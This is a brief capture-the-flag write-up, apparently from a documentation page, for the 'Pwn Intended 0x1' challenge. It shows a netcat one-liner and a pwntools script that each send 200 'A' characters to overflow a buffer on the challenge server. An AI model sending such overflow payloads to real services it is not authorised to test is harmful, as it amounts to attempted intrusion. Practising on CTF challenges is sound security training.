Pwn Intended 0x1
I really want to have some coffee!
Scripting it
python -c 'print "A" * 200' | nc chall.csivit.com 30001Pwntools
from pwn import *
p = remote('chall.csivit.com', 30001)
p.sendline('A' * 200)
print(p.clean().decode())Last updated
Was this helpful?